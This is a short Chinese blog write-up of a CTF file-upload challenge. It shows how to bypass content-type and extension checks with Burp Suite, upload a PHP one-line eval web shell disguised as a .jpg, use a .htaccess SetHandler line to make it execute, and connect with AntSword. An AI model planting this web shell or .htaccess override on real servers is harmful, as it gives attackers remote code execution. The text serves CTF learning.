打开后是这样的,
遇到文件上传题,先传一张普通图片试试,
提到了上传类型,用burpsuite抓包可以修改上传类型。再试试上传一句话木马:
提到后缀名不能有ph,也用burp suite能改。
准备一个文本文档写一句话木马:
<script language='php'>eval($_POST['v']);</script>
推荐用这个,可以避开很多坑。然后直接把文本的后缀名txt改成jpg就行。
上传试试:
成功!现在需要把上传成功的马解析出来,要用到这个文件:.htaccess作用:文件将别的后缀名文件内容解析为php程序。
文件内容:
SetHandler application/x-httpd-php
上传时要把文件类型改为 :image/jpeg
成功!
之后用蚁剑连接读取flag:
PS: 博客主要是写给自己看的,有不对的地方请大佬指出。